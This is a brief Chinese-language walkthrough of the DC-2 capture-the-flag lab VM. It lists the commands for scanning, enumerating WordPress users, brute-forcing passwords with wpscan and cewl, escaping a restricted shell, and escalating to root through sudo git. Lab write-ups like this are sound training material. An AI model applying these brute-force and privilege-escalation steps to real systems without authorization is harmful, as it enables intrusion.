DC-2 靶机
DC-2靶机下载地址: DC-2 | Five86 | DC Challenges
环境:DC-2靶机地址:192.168.1.139
nmap -sP 192.168.1.0/24 查看ip nmap -A 192.168.1.139 #这里我的靶机IP是132 dirb 192.168.1.139 爆破目录
这里查出了靶机IP为192.168.1.139 靶机开放了80端口和7744端口、
然后访问192.168.1.139发现是这个界面,什么也没有看到
(通常是解析造成的)在hosts文件添加对应的ip和域名 保存并退出
vim /etc/hosts
然后访问192.168.1.139
往下滑发现flag1
根据提示,搜索cewl,发现是一个kali自带的密码生成工具
wpscan --url http://dc-2 --enumerate u #扫出dc-2的用户 admin Jerry tom vim dc-2_user.txt #将用户写入该文件 cat dc-2_user.txt #查看该文件 cewl -w dc2-passwords.txt http://dc-2 将cewl生成的密码写进password
使用wpscan进行爆破
wpscan --ignore-main-redirect --url 192.168.1.139 -U dc-2_user.txt -P dc2-passwords.txt --force
爆出两个用户名和密码
然后用ssh对其中一个进行连接,输入密码
ssh tom@192.168.1.132 -p 7744
接着,,,
BASH_CMDS[a]=/bin/sh;a export PATH=$PATH:/bin/ export PATH=$PATH:/usr/bin
找到flag3
切换到Jerry用户找到flag4
flag4 提示我们可以使用git,我们可以通过git来提权
sudo -l sudo git -p help
然后弹出一堆东西最后是个冒号,我们在冒号后面输入
! /bin/bash
然后就到了root用户再输入id ,whoami查看自己的成果
祝你有一个美好的一天!!!
推荐阅读